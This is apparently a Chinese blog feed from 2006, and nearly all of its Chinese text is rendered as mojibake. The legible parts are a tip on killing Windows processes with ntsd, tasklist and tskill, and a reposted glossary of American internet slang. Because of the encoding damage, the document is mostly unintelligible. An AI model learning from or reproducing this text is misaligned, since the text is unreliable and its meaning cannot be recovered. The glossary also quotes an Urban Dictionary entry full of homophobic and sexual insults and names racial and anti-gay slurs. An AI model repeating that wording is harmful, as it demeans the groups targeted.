鍦╳indows涓紝鍙湁System銆丼MSS.EXE鍜孋SRSS.EXE涓嶈兘鏉銆傚墠涓や釜鏄函鍐呮牳鎬佺殑錛屾渶鍚庨偅涓槸Win32瀛愮郴緇燂紝ntsd鏈韓闇瑕佸畠銆俷tsd浠?000寮濮嬪氨鏄郴緇熻嚜甯︾殑鐢ㄦ埛鎬佽皟璇曞伐鍏楓傝璋冭瘯鍣ㄩ檮鐫(attach)鐨勮繘紼嬩細(xì)闅忚皟璇曞櫒涓璧烽鍑猴紝鎵浠ュ彲浠ョ敤鏉ュ湪鍛戒護(hù)琛屼笅緇堟榪涚▼銆備嬌鐢╪tsd鑷姩灝辮幏寰椾簡(jiǎn)debug鏉冮檺錛屼粠鑰岃兘鏉鎺夊ぇ閮ㄥ垎鐨勮繘紼嬨俷tsd浼?xì)鏂板紑涓涓皟璇曠獥鍙o紝鏈潵鍦ㄧ函鍛戒護(hù)琛屼笅鏃犳硶鎺у埗錛屼絾濡傛灉鍙槸綆鍗曠殑鍛戒護(hù)錛屾瘮濡傞鍑?q)錛岀敤-c鍙傛暟浠庡懡浠よ浼犻掑氨琛屼簡(jiǎn)銆侼tsdNtsd 鎸夌収鎯緥涔熷悜杞歡寮鍙戜漢鍛樻彁渚涖傚彧鏈夌郴緇熷紑鍙戜漢鍛樹(shù)嬌鐢ㄦ鍛戒護(hù)銆傛湁鍏寵緇嗕俊鎭紝璇峰弬闃?NTSD 涓墍闄勭殑甯姪鏂囦歡銆傜敤娉?寮涓猚md.exe紿楀彛錛岃緭鍏ワ細(xì)<br />聽(tīng)聽(tīng)聽(tīng) ntsd -c q -p PID <br />聽(tīng)聽(tīng)聽(tīng) 榪樻湁灝辨槸tasklist銆乼skill鎴杢askkill銆倀asklist鑳藉垪鍑烘墍鏈夌殑榪涚▼錛屽拰鐩稿簲鐨勪俊鎭倀skill鑳芥煡鏉榪涚▼錛岃娉曞緢綆鍗曪細(xì)tskill 紼嬪簭鍚?/font> </p> <img src ="http://m.shnenglu.com/asp/aggbug/15679.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/asp/" target="_blank">Asp</a> 2006-11-26 18:57 <a href="http://m.shnenglu.com/asp/archive/2006/11/26/15679.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>緹庡浗璁哄潧鐢ㄨ灝忚http://m.shnenglu.com/asp/archive/2006/10/31/14454.htmlAspAspTue, 31 Oct 2006 15:35:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/31/14454.htmlhttp://m.shnenglu.com/asp/comments/14454.htmlhttp://m.shnenglu.com/asp/archive/2006/10/31/14454.html#Feedback5http://m.shnenglu.com/asp/comments/commentRss/14454.htmlhttp://m.shnenglu.com/asp/services/trackbacks/14454.html 浠ヤ笅鏄漿璐達(dá)紝鏂囩珷鍑哄錛?a >http://www.playes.net/Blog/425.asp

鍏堜粙緇嶄竴涓緢媯掔殑绔欍?/font> http://www.urbandictionary.com/ 涓鑸潵璇達(dá)紝浣犲鏋滃湪嫻忚璁哄潧鐨勬椂鍊欑湅鍒頒笉鎳傜殑璇嶏紝灝卞幓鏌ヨ繖閲岋紝鍖呭噯娌¢敊銆?/font>

棣栧厛鎴戜滑蹇呴』鏄庣櫧涓鐐癸紝緹庡浗浜烘槸寰堟噿鐨勶紝鎴戜滑涔熸槸寰堟噿鐨勶紝浣嗘槸鎴戜滑榪樻病鏈夌編鍥戒漢鎳掋傜帺澶氫簡(jiǎn)娓告垙鐨勯兘錛堜簩澹幫級(jí)鏅撳緱錛屽緢澶氭父鎴忥紝鍖呮嫭鍑哄悕鐨勫拰涓嶅嚭鍚嶇殑錛岄兘鐢ㄩ瀛楁瘝緙╁啓浠h〃榪欎釜娓告垙銆傚鏋滀綘瀵硅繖涓父鎴忎竴鏃犳墍鐭ユ垨鑰呭垰鍒氫笂鎵嬶紝浜哄璁ㄨ榪欎釜娓告垙浣犻兘涓嶈寰楁槑鐧戒漢瀹跺湪璇翠粈涔堝憿鈥︹﹂偅涔堚斺?/font>

PART 1銆佺緝鍐?/font>

鏈甯歌鐨勭緝鍐欒嚜鐒舵槸Wtf. What the fxxk. 榪欎粬濡堝埌搴曟庝箞浜?jiǎn)锛屽ぇ鎰忓姝ゃ?琛嶇敓鍑烘潵鐨勬湁Wth, wtfh,鍓嶈呮槸what the hell, 鍚庤呮槸what the fxxking hell.

lol涔熸槸鏈甯歌鐨勭緝鍐欎箣涓銆傚緢涓嶅垢錛岃繖涓瘝鍦ㄧ編鍥戒竴涓潅蹇椾笂鐨勮В閲婃槸Lots of Love銆傛垜鎰ゆ掑湴楠備簡(jiǎn)涓澹板皬鐧戒箣鍚庯紝涓嶅緱涓嶆帴鍙楁煇浜涚編鍥界埗姣嶅湪鐪嬩簡(jiǎn)閭d釜鏉傚織涔嬪悗鍦ㄩ佺粰鑷繁瀛╁瓙鐨勭ぜ鐗╀笂闈㈠啓涓娾渓ol鈥濈殑浜嬪疄鈥︹﹀ソ浜?jiǎn)涓嶅鎵Q岃繖涓瘝鐨勬剰鎬濇槸Laugh out loud銆傛斁澹板ぇ絎戙?/font>

Omg錛岃繖涓槸緇忓吀鐨勭緝鍐欎簡(jiǎn)錛孫h my god! Omfg錛孎-word宸茬粡瀹屽叏鎴愪簡(jiǎn)璇皵鍔╄瘝浜?jiǎn)锛孫h my fxxking God. OMFGBBQ錛孊BQ涔熸槸涓涓姘斿姪璇嶃傝繖涓瘝鍚庨潰榪樿璁插埌銆傚緢鏈夎叮銆俍OMG錛孼娌℃湁浠諱綍鎰忎箟錛岃〃紺哄姞寮鴻姘斺斺旇繖涓悗闈篃瑕佹彁鍒般?/font>

Lmao,Rofl銆傝繖涓や釜璇嶆剰鎬濆樊涓嶅銆傚墠鑰呮槸Laugh my ass off.鎶婃垜鐨刋X絎戞帀浜?jiǎn)銆傚悗鑰呮槸Roll on the floor laughing,婊氬湴鏉跨瑧銆傝繖ROFL鍏跺疄鍜岀尗鎵戠殑233鏈夊紓鏇插悓宸ヤ箣濡欌斺旇屼笖錛屽疄闄呬笂233鐨勬敼榪涚増鏈夋粴鏉ユ粴鍘葷殑錛岄偅鏍規(guī)湰灝辨槸涓鏍蜂簡(jiǎn)銆?/font>

qft銆備綘鐪嬶紝榪欎釜涓滆タ鍏跺疄鍜變滑寰堝浜哄湪鐢紝浣嗘槸鐢ㄨ嫳璇啓鍑烘潵灝辯湅涓嶆噦浜?jiǎn)缗炩︹uote for truth鐨勭緝鍐欍傜被浼間簬鈥滄敮鎸侊紝綰紩鈥濄傚綋鐒?dòng)灱屼綘鍦∟GA騫茶繖縐嶄簨鎯呮槸瑕佽灝佸彿鐨勨︹?/font>

Imo銆傝繖涓瘝鐪嬩笂鍘誨拰Lmao寰堣薄錛屼笉榪囨剰涔夊畬鍏ㄤ笉鍚屻傚畠鏄疘n my opinion鐨勭緝鍐欙紙鍝﹀師鏉ヨ繖涔堟緇忓晩錛屽ソ鏃犺亰濂芥棤鑱娾︹︼級(jí)銆備簨瀹炰笂榪欎釜璇嶉氬父鏄鍧涙帎鏋剁殑寮濮嬶紝瀹冪殑鍙樹(shù)綋鏈塈mho錛孖n my humble opinion錛屽ぇ鏈夆滃尯鍖哄湪涓嬩笉鎵嶏紝瀵硅繖涓棶棰樻槸濡傛鐪嬬殑錛岄榿涓嬭嫢鏈夐珮瑙侊紝灝借璇存潵鈥濈殑鎰忔濄?/font>

Irl銆傚拰Url濂借薄鈥︹︾湡涔夋槸In real life銆?閫氬父鏈変袱涓敤閫旓紝涓鏄淚 lol'd irl"錛宭ol鏈夋椂浠呬粎鏄〃紺衡濅綘寰堝菇榛樷滐紝鏇村鐨勬槸涓縐嶈禐璧忥紝鑰屸淚 lol'd irl"鍒欐洿榪涗竴姝ワ紝琛ㄧず鈥滄垜鐪熺殑絎戜簡(jiǎn)鈥濄備簩鏄淗ot girl irl鈥濓紝鎴戝叾瀹炴槸涓紓浜コ瀛╁摝~~緹庡浗浜轟漢濡栦篃寰堝鐨勨︹?/font>

FTW銆侳or the win.鐢ㄤ簬嬈㈠懠銆傛瘮濡傚幓騫碢ittsburgh Steelers闃熸嬁浜?jiǎn)姗勬鐞冨啝鍐涘Q岄偅涔堝氨鏄疨ittsburgh Steelers ftw! 鎴戜滑榪欓噷涓涓編鍥界儌浜虹‖璇磋繖涓瘝鏄?Fxxk the world鐨勬剰鎬濓紝鎴戣閭SA榪樻槸U sucking ass鐨勬剰鎬濆憿鈥︹︿粬瑕佸拰鎴戞墦鏋訛紝鎴戞曚簡(jiǎn)錛屼簬鏄敹鍥炰簡(jiǎn)鎴戠殑鐪嬫硶銆?/font>

Stfu銆係hut the fxxk up銆係hut up鐨勫己璋冪増銆傛湁浜鴻鍙湁Loser鎵嶄細(xì)榪欎箞璇達(dá)紝濮戜笖淇′箣錛岄偅涔堝畠鐨勬剰鎬濆ぇ綰﹀氨璺熷惖鏋朵腑澶у惣鈥滀綘浠栧悧鐨勭粰鑰佸瓙浣忓槾鈥濈劧鍚庤涔堝紑濮嬪姩鎵嬫墦浜鴻涔堟帺闈㈣窇寮綾諱技銆?/font>

Brt, BRB錛宱mw銆傝繖鍑犱釜璇嶅湪璁哄潧涓婄敤鐨勪笉澶氾紝絎竴涓槸Be right there錛岄┈涓婂埌錛涚浜屼釜鏄痓e right back錛岄┈涓婂洖錛涚涓変釜鏄痮n my way錛屽湪璺笂銆傚鍦ㄦ父鎴忛噷闈㈢敤鍒般傜帺鎴樼綉鐨勬湅鍙嬪ぇ閮芥檽寰椼?/font>

鍏跺疄緙╁啓榪樻湁寰堝浜?jiǎn)銆傛垜鏄兂鍒板摢鍐欏埌鍝紝浠ュ悗鍐嶆參鎱慨鏀瑰ソ浜?jiǎn)鈥︹︿笉璁哄浣曪紝鎴戜滑寮濮嬧斺?/font>

Part 2銆佽薄褰?鎷熷0

<3銆傛垜瀵硅繖涓瘝鏄糠緋婁簡(jiǎn)寰堜箙鐨勨︹︾洿鍒版湁涓澶╀漢瀹跺憡璇夋垜銆俋D澶у閮界煡閬撲粈涔堟剰鎬濈艦錛堟í榪囨潵鐪嬶級(jí)銆傝繖璇嶄篃涓鏍楓傞偅涔堝畠鐨勬剰鎬濆氨鏄疞OVE浜?jiǎn)锛尵c諱技浜庢垜浠湪璁哄潧涓婅鈥滃ぇ蹇?jī)~~鈥濄?/font>

Lawl銆傝繖涓槸lol鐨勮薄澹板啓娉曪紝琛ㄧず寮鴻皟銆傗渁w鈥濆湪鑻辨枃涓拰鈥渙鈥濈殑鏅亶鍙戦煶涓鏍楓傚畠琛ㄧず鐨勬槸涓縐嶅彂闊籌紝鑰屼笉鏄淟鈥濃淥鈥濃淟鈥濅竴涓竴涓瓧姣嶅湴璇誨嚭鏉ョ殑緙╁啓銆?/font>

Rawr銆傚拰鍓嶈呬竴鏍鳳紝鏄疪oar鐨勮薄澹板彉?shù)綋銆傚彲浠ョ敤鍋氭寫琛呬篃鍙互鐢ㄤ綔琛ㄧず鍏村銆?/font>

1337銆侺eet鐨勬暟瀛楀啓娉曘侺eet鏈韓涔熸槸涓涓綉緇滈粦璇濓紝鏀懼埌鍚庨潰璁層?/font>

hax錛孒ack鐨勮薄澹板啓娉曪紝灝辨槸浣犺繖瀹朵紮鐢ㄥ鎸備簡(jiǎn)鈥︹﹀畠鐨勭敤閫斾笉姝㈡槸璇村鎸傦紝鍑℃槸涓嶆褰撳湴鍦ㄧ珵浜変腑棰嗗厛錛屽叏閮ㄥ彲浠ョ敤銆?/font>

Phat錛宖at鐨勮薄澹板啓娉曘侳AT涓鑸〃紺哄潖涓滆タ銆侳AT GIRL鏄濂沖鐨勪井杈辨ц瘝璇紝浣犺榪欎釜濂沖瀛愪細(xì)鍝殑銆備絾鏄疨hat琛ㄧず寰堟錛屽緢濂斤紝鏄洜涓衡滀笢瑗垮緢澶氣濊屽鑷寸殑濂姐傞瓟鍏戒笘鐣岄噷闈⑩淧hat loot鈥濇鏄敱姝よ屾潵銆?/font>

Woot銆傚拰wut涓嶅悓錛學(xué)oot涓嶆槸what鐨勬嫙澹板彉?shù)綋銆備綘鍙互榪欎箞璇誨畠錛歸u(浜屽0錛塽(鍥涘0錛塽錛堣交澹幫級(jí)t銆傝繖涓瘝鏄潵婧愪簬WOW!loot!錛岃〃紺哄簡(jiǎn)紲濊湀铓f礊閲岄潰鐨勬帀瑁呭浜?jiǎn)銆傜劧鍚庣敱浜庡畠鍜屾劅鍙硅瘝鈥淲ooHoo鈥濈殑鎺ヨ繎琚畝鍖栨垚浜?jiǎn)Woot銆傝繖涓瘝涔熷父甯歌鏁板瓧鍙樺啓涓簑00t銆?/font>

:D, :P錛岃繖浜涗篃鏄薄褰紝浣嗘槸澶у閮界煡閬擄紝鎴戝氨涓嶈浜?jiǎn)銆傞偅涔堝紑濮嬧斺?/font>

Part 3銆佸叾瀹?/font>

Own銆傝繖涓瘝鐨勬剰鎬濇棤闈炲氨鏄滄垬鑳溾濄備粈涔堟牱鐨勬垬鑳滃憿錛熷帇鍊掓х殑鎴樿儨錛屽叏闈㈢殑鍘嬪埗銆備綘鍙互浣跨敤榪欎釜璇嶆潵琛ㄧず鈥淕rubby鍜屾垜鎵撲簡(jiǎn)涓鍦洪瓟鍏斤紝浠栨垬鑳滀簡(jiǎn)鎴戔濄傝繖涓瘝涔嬫墍浠ユ湁鍚嶏紝鏄洜涓鴻繖涓瘝琚漢鐢ㄧ殑澶錛屾墍浠ュ畠鐨勮繃鍘誨垎璇嶅父甯歌鎵撴垚鈥淧wnt鈥濄傝涔堟槸鍚嶄漢鐢ㄨ繃錛堟瘮濡傦紝鑺欒搲濮愬璇翠簡(jiǎn)鈥淧wnt鈥濅簡(jiǎn)錛夛紝瑕佷箞鏄疧鍜孭瀹炲湪鏄お瀹規(guī)槗鎵撻敊浜?jiǎn)锛屾諱箣Pwnt鎴愪負(fù)浜?jiǎn)涓涓悎娉曠敤閫斻備綘鍙互鐢ㄢ淚 got pwnt鈥濇潵璧炶祻鑷繁鐨勫鎵嬨侽wnt鍜孫wned涔熸槸姝e父鐨勭敤娉曘?/font>

Leet銆傝繖涓瘝鍗曞垪涓鏉°備粈涔堟剰鎬濓紵浣犺榪囩帺欖傛枟緗椾笉鎺ユ灙涓嶆鍛介氬叧鐨勭艦錛熻繖浜哄氨鏄疞eet銆傚畠鏄淓lite鈥濈殑緗戠粶鍐欐硶銆侲lite鏄簿鑻辯殑鎰忔濓紝leet鍒欎竴鑸寚娓告垙涓婄殑綺捐嫳銆傛垜浠彲浠ヨ錛岀綏鐐滄槸涓涓姝﹁卨eet錛屼絾鏄憿錛屼笁涓瓧錛屾垜涓嶄俊錛堣繖涓鍙ョ湅涓嶆噦鐨勫彲浠ョ渷鎺夛級(jí)銆傚ぇ鑷村姝ゃ?/font>

Emo銆傝繖涓瘝寰堟湁鎰忔濄傜編鍥芥湁涓箰闃燂紝鍙仛EMO錛屽父甯告紨涓浜涗激鎰熺殑姝屻傜劧鍚庢場(chǎng)鍧涘瓙鐨勪漢灝卞父甯哥敤榪欎釜璇嶅艦瀹歸偅浜涚緇忓叜鍏殑瀹朵紮錛屾瘮濡傛暣澶╀貢鍤封淢y life sucks鈥濈殑瀹朵紮銆傝繖縐嶄漢鍒錛岃繕鐪熸湁錛屾垜涓涓鐢熷氨榪欐牱錛屼笂瀹為獙璇句箣鍓嶅父甯告嬁鐫涓鏈彃鍥句笂鐢葷潃鐜嬪瓙鍜屽叕涓葷殑涔﹀鎴戣錛屼綘鐪嬩粬浠ソ騫哥鎸栵紝鎴戝ソ緹℃厱鎸栵紝浣犺寰楄繖鏄湡鐨勮繕鏄敾鐨勫悧錛岀瓑絳夈傛灄榛涚帀褰撶劧涔熸槸鏍囧噯鐨凟MO浜?jiǎn)銆傝繖涓瘝鍦║rban Dictionary涓婄殑涓涓В閲婃瀬媯掞紝鎷挎潵鍏變韓錛岀炕璇戝氨鍏嶄簡(jiǎn)錛岀湅鐨勬噦灝辯湅緗€?/font>

1. Girls say they like "sensitive guys" (lie)
2. Guy finds out, so he listens to faggy emo music and dresses like a dork so chicks will see that he is sensitive and not afraid to express himself (lie). He dyes his hair black, wraps himself in a stupid looking scarf, develops an eating disorder, and rants about how "nobody understands".
3. Now an emo guy, he meets Emo chick and they start dating, talking about how their well-off suburban lifestyles are terrible and depressing (lie)
4. Emo guy is just too much of a pussy. His penis is too small, he's too depressed to bathe, and has more mood swings than emo chick, and he doesn't even have a menstrual cycle. Emo chick dumps him, saying "It's not you, it's me." (lie) as she drives off with Wayne, the school jock and captain of the football team.
5. Emo guy goes home and cries, proceeds to write a weak song and strum a single string on his acoustic guitar. Another emo chick sees how he is so in touch with his feelings, and the cycle continues.

BBQ銆傝繖璇嶅緢媯掋傚湪OMFGBBQ閲岄潰錛屽畠鍙搗鍒頒簡(jiǎn)寮鴻皟鐨勪綔鐢ㄣ侭BQ涓鑸寚鐑х儰錛孊arbeque,榪欎釜澶у閮界煡閬擄紝浣嗘槸瀹冧負(fù)浠涔堣兘璧峰己璋冪殑浣滅敤鍛紵鍥犱負(fù)榪欒瘝浠h〃浜?jiǎn)鏃犳暟鐨劸~╁啓錛宐etter be quick, Bitch be quiet錛岀瓑絳夛紝鎵浠ヨ繖涓瘝灝變唬琛ㄤ簡(jiǎn)瀵圭緝鍐欑殑閯欒錛岃浣犺繖涓殑涔辯緝鍐欏槢銆備簬鏄畠涔熻璧嬩簣浜?jiǎn)琛ńC哄己璋冪殑鎰忎箟錛堢編鍥戒漢鐨勮仈鎯斥滆仈鐢ㄢ濊兘鍔涚湡寮衡︹︼級(jí)

ZOMG銆傝繖涓瘝涔熻鍗曞垪銆傚洜涓烘湁鍑哄吀銆備負(fù)浠涔堜細(xì)鍑虹幇鈥淶OMG鈥濓紵鍥犱負(fù)OMG閫氬父鐢ㄥ叏閮ㄥぇ鍐欒〃紺鴻姘斿己璋冦傚湪涔﹂潰璇█閲岋紝鍏ㄩ儴澶у啓鏄潪甯擱潪甯鎬笉紺艱矊鐨勶紝浣嗘槸涓轟簡(jiǎn)琛ㄧず寮鴻皟錛屼綘鍏ㄥぇ鍐欎篃鍙互銆傞棶棰樻槸錛屼綘澶у啓鍑烘瘺鐥呬簡(jiǎn)鈥斺斿ぇ鍐欒鎸夆渟hift鈥濋敭錛屼綘澶縺鍔ㄤ簡(jiǎn)錛岀粨鏋滄寜shift閿悓鏃舵寜鈥渙鈥濈殑鏃跺欙紝榪炵潃shift閿竟涓婄殑z涔熸寜涓嬪幓浜?jiǎn)鈥︹︿綘鐪嬶紝榪欐牱鏉ヨ〃紺轟綘鐨勬縺鍔ㄦ槸涓嶆槸瓚呭嚭瀵誨父鍛紵榪欏氨鏄痁OMG鐨勬潵鐢便?/font>

Lame銆傝繖涓瘝鏃犳硶鐢ㄤ腑鏂囩炕璇戙傛垜鍙婦渚嬩簡(jiǎn)銆侺AME灝辨槸鐢ㄦ潵褰㈠鑺欒搲濮愬銆佽綰編銆佸ぇ浣滃寮犳枌銆佷紵澶х殑鍒樹(shù)紵鈥︹︾瓑絳変竴緋誨垪浜虹墿鐨勪笓鏈夊悕璇嶁︹?/font>

Chuck Norris銆傝繖涓瘝涓嶅緱涓嶅崟鍒椾竴鏉°侰huck Norris 闈炲父 Lame銆備粬鏄釜姝︽湳瀹訛紝婕斾簡(jiǎn)涓涓數(shù)瑙嗚繛緇墽錛屽ぇ綰︽槸銆奣EXAS RANGER銆嬩箣綾葷殑鍚嶅瓧緗紝閲岄潰婕斾竴涓編鍥藉紡鑻遍泟銆備笉騫哥殑鏄紝婕旂殑瀹炲湪鏄お鍋氫綔鑰屽け璐ヤ簡(jiǎn)鈥︹︾粨鏋滄湁涓ソ浜嬭呭湪緗戠粶涓婂啓浜?jiǎn)鈥?/font> 100 TOP facts about Chuck Norris 鈥濓紝鍏ㄩ潰鍦拌鍒轟簡(jiǎn) Chuck Norris 鐨勬鏈侀湼姘旓紝榪樻湁鎬ц兘鍔涖傝繖涓笢瑗垮湪緹庡浗緗戠粶涓婂紩璧蜂簡(jiǎn)杞板姩鏁堟灉錛孋huck Norris 浜庢槸鍑哄悕浜?jiǎn)鈥︹︿粬灝辨槸緹庡浗鐨勮姍钃夊濮愨︹?/font>

Fag/faggot銆傚GAY鐨勪井杈辨ц娉曘傛嬁鏉ラ獋浜虹敤鐨勩備綘鍙互璇翠竴涓狦AY鏄疓AY錛屼絾鏄綘涓嶈兘璇翠竴涓狦AY鏄疐AGGOT銆傝繖絳変簬璇翠綘鍙互璇翠竴涓粦浜烘槸BLACK MAN錛屼絾鏄笉鑳借浠栨槸Negro銆傚綋鐒朵綘鎷胯繖涓獋姝e父浜轟竴鐐歸棶棰橀兘娌℃湁鈥︹︼紙浣嗘槸濡傛灉浜哄鐪熺殑璺熶綘杈冪湡榪樻槸鑳藉憡浣犳瑙咷AY鍝~錛?/font>

Freak/Hack/Darn銆傝繖涓変釜璇嶅茍鍒楁帓鍑猴紝瀹冧滑鍒嗗埆鏄滷xxk"/"Hell"/"Damn"鐨勫急鍖?鍚堢悊鍖栫敤娉曘傜畝鍗曞湴璇達(dá)紝涓涓佸笀鍦ㄨ璇撅紝浠栦笉鑳借鑴忚瘽錛屼絾鏄粬鎯崇敤鈥淔xxk鈥濇潵琛ㄧず寮鴻皟鍜屼翰鍜屽姏銆傝繖鏃朵粬灝辯敤freak錛堥煶/frik/錛夋潵鏇挎崲fxxk銆傝嫳璇噷闈hit銆丠ell銆丏amn銆丗uck銆丄ss閮藉睘浜嶤urse/swear錛屽拻楠備簡(jiǎn)錛岀浉褰撲簬鏄剰璇濓紝涓鑸槸涓嶈兘璁茬殑銆備絾鏄編鍥芥槸涓涓矖淇楃殑鍥藉害錛屼漢浠枩嬈㈣榪欎簺璇嶏紝灝卞ソ姣旇璁測(cè)滀粬濡堢殑鈥濇湁鏃跺欏凡緇忎笉浠h〃楠備漢鑰屼唬琛ㄥ己璋冧竴鏍楓備簬鏄粬浠嬌鐢‵reak榪欎簺闊崇浉榪戠殑璇嶈鏉ユ浛鎹㈣繖浜涜瘝銆備嬌鐢ㄨ繖浜涜瘝璇殑鏃跺欙紝琛ㄨ揪鐨勮姘斾篃娌℃湁鐢ㄥ師璇嶅己鐑堛傜被浼肩殑涓枃鐢ㄦ硶錛屾鏄垜浠ぉ澶╃敤鐨勪竴涓瘝錛氣滈潬錛佲?/font>

Fo' shizzle my nizzle銆傝繖鏄緇熺殑鈥滃競(jìng)浜曠敤璇濅簡(jiǎn)銆傜編鍥界殑甯?jìng)浜曠敤璇富瑕佹槸鐢变簬鑲麈皯鍖哄ぇ閮芥槸榛戜汉锛屽洜姝よ鐨勮瘽閮藉甫鏈夐粦錆h鍙i煶鑰屾潵鐨勩傝鍞變箰姝f槸榪欑璇█鐨勯煶涔愬艦寮忋傝繖涓煭璇唬琛ㄧ殑鏄競(jìng)浜曡鐨勪竴縐嶅彛闊籌紝瀹冨師鏈槸鍏沖湪鐗㈡埧閲岀殑榛戜漢寮熷厔鎵撶數(shù)璇濓紝涓轟簡(jiǎn)閬垮厤琚漢鍚噦鑰屽彂鏄庣殑錛岃岀敱浜嶴noopy榪欎釜鍔ㄧ敾鐗囪屽箍娉涗紶鎾紑鏉ャ傝繖縐嶅彛闊崇殑鐗圭偣鏄湪姣忎釜璇嶅悗闈㈤兘鍔犱笂鈥?izzle鈥濇潵娣鋒穯鍙i煶銆傝嚦浜嶧o' shizzle my nizzle錛岃繖涓彞瀛愬畬鍏ㄧ炕璇戣繃鏉ユ槸鈥渇or sure, my niggar鈥濓紙褰撶劧浜?jiǎn)锛屾垜鐨勫厔寮熷Q夈侼iggar鏄痭egger/negro鐨勯粦浜哄彛闊沖彉?shù)綋锛屽彧鐢ㄥ湪榛戜恨Z箣闂翠簰鐩哥О鍛間腑錛岃〃紺衡滃悓涓洪粦浜虹殑鏈嬪弸鈥濄傚鏋滅櫧浜虹敤浜?jiǎn)杩欎釜璇嵔{変簬鏄鏃忔瑙嗐?/font>

Moron/Retarded銆係illy澶у閮界煡閬撶艦錛烻tupid澶у閮界煡閬撶艦錛烮diot澶у閮界煡閬撶艦錛熶竴涓剰鎬濄備笂嬈¢偅涓墍璋撯滀腑鍥界増娉勯湶鐨?.11patch notes鈥濋噷闈紝灝辨湁浜鴻瘎浠瘋錛屼笂17173鐨勯兘鏄痬orons銆傚氨鏄繖涓剰鎬濅簡(jiǎn)銆?/font>

Epeen銆侲-pennis鐨勭緝鍐欍傜數(shù)鍔╔X錛屾剰鎬濇槸鎸囷紝浣犲叾瀹炲凡緇忎笉鑳藉媰璧蜂簡(jiǎn)錛屼絾鏄潬鐢?shù)鍔ㄧ殑鏉ュ媰钃v銆傜綉緇滀笂鏄寚浣犺涓嶈繃鍒漢浜?jiǎn)锛岀劧鍚庤鑷忿q幇瀹炵敓媧諱腑鍏跺疄寰堝己錛屾瘮濡傝NGA鏌愪簺浜哄父鐢ㄧ殑錛岃浣犵幇瀹炰腑鏄釜LOSER錛岃佸瓙鏈姣曚笟/鐮旂┒鐢熸瘯涓?宸ヤ綔浜?jiǎn)锛屽張鎴栬呮垜鑷繁鍦ㄥ紑澶寸偒鑰鑷繁GRE 1380 TOEFL 663銆傝繖涓瘝琚玏OW鐨勪漢鐢ㄦ潵璁藉埡PVE榪涘害錛岀О涓衡淧VEPEEN鈥濓紝鎰忔濇槸璇翠綘FD浜?jiǎn)BOSS鏈変粈涔堝ソ鐐鐨勶紝PVP鎵嶆槸鐜嬮亾銆?/font>

Leech銆傝繖涓瘝鍘熸寚鏌愪簺FTP錛屼笉闇瑕佷笂浼犲嵆鍙笅杞斤紝鍚庢潵鍙樻剰涓轟嬌鐢˙T闄愬埗涓婁紶甯﹀絳夌瓑錛屾諱箣灝辨槸涓嶄粯鍑?guó)檧岃幏鍙栥傚湪WOW閲岄潰錛屽彲浠ヨ鍒洪偅浜涙寕鏈哄埛鑽h獕鐨勪漢錛屽張鎴栬匨C閲岄潰錛屾柊浜轟竴韜豢瑁呰窇鍘伙紝鍙堜笉鍑哄姏錛屽張鎷胯澶囥傛悶絎戠殑鏄疻OW閲岄潰錛孊FD錛堥粦鏆楁繁娓婏級(jí)鏈夎繖涓狣ROP錛屽彨鍋歀eech pants,鏈鍚庣殑鑰佹澘鎺夈傚畠鐨勪腑鏂囧悕縐版槸 [鍚歌鐭¥] 錛岀湡褰㈣薄鈥︹?/font>

1. epeen鏄痚鍜宲een鐨勫鍚堣瘝, peen鏄痯in鐨勫悓闊沖紓鍐欙紝pin鐨勬効鎰忔槸鏍囩寰界珷浠涔堢殑, 榪欓噷鐩稿綋浜庡樊涓嶅reputation鐨勬剰鎬? epeen鍩烘湰涓婄浉褰撲簬e-reputation, 澶ц嚧鐩稿綋浜庣綉緇滀笂鐨勫0鏈涚殑鎰忔? epeee鐨勫瓧闈㈡剰涔夋槸涓х殑浣嗚鐢ㄤ笂鏄船涔夎瘝, 姣斿鍚勪釜realm forum涓婂綋鏌愪漢鑷惞浠杁uel鎴栬卋g璧簡(jiǎn)鍏朵粬浜烘椂瀵規(guī)柟涔熻灝變細(xì)鍥炶創(chuàng)璇磋濡?gratz you gains epeen+10"涔嬬被鐨勮瘽錛屽叾璇敤鎰忎箟灝辨槸璇村湪rl浣犱粈涔堥兘娌″緱鍒頒箣綾匯?/font>

2. leech鐨勬潵婧愬茍涓嶆槸p2p涓嬭澆鏈, 鑰屾槸d2閲岃竟涓縐嶈澶囧睘鎬?leech x% life/mana on attack"銆傚叾瀛楅潰鎰忎箟灝辨槸鍚歌銆傚悗鏉ュ湪d2閲屽氨鏈変簡(jiǎn)寮bus涓嬬墰鍏蟲(chóng)椂濡傛灉鏈塨aby鏉ヨ弓緇忛獙灝卞彨leech銆倃ow閲岃竟寰堝鐜╁閮界帺榪嘾2鎵浠ュ浜庣被浼肩殑韞粡楠?澹版湜/鑽h獕涔熻嚜鐒惰岀劧鐨勭敤浜?jiǎn)leech銆俫oogle涓涓嬪氨鐭ラ亾, leech浣滀負(fù)鈥滆弓緇忛獙鈥濊繖涓剰鎬濈殑鏃跺欎富瑕佹槸鍑虹幇浜巄lizz娓告垙鐨勭浉鍏崇珯鐐廣?/font>

3. >3, XD浠ュ強(qiáng):P涔嬬被鐨別moticon鐨勭洿鎺ユ潵婧愭槸緹庡紡婕敾錛岃屾渶鏃╂潵婧愯繕鏄熀浜庣數(shù)瀛愰偖浠舵枃鍖栫殑琛ㄦ儏絎﹀彿緋葷粺銆傜編鍥芥極鐢葷殑emoticon鍑犱箮閮芥槸绔栫湅鐨剉erticon, 鑰屾棩寮忔極鐢婚噷杈瑰垯澶氬崐鏄í鐪嬬殑銆傝繖璺熶袱縐嶆極鐢誨湪瀵硅瘽鎺掔増涓婄殑欏哄簭鏈夊叧銆俥moticon涓鑸兘瑕佷笌鏂囧瓧欏哄簭鐩稿紓浠ラ伩鍏嶆販娣嗭紝鎵浠ュ湪妯増鏂囧瓧鐨勭編寮忔極鐢婚噷澶氫嬌鐢╲erticon銆?/font>

4. lame. freak,moron, retarded絳? 閮芥湁鍏剁壒鏈夎涔? 鑰屼笉鍙槸鑺欒搲濮愬, fuck, silly, stupid鐨勬剰鎬濄?/font>

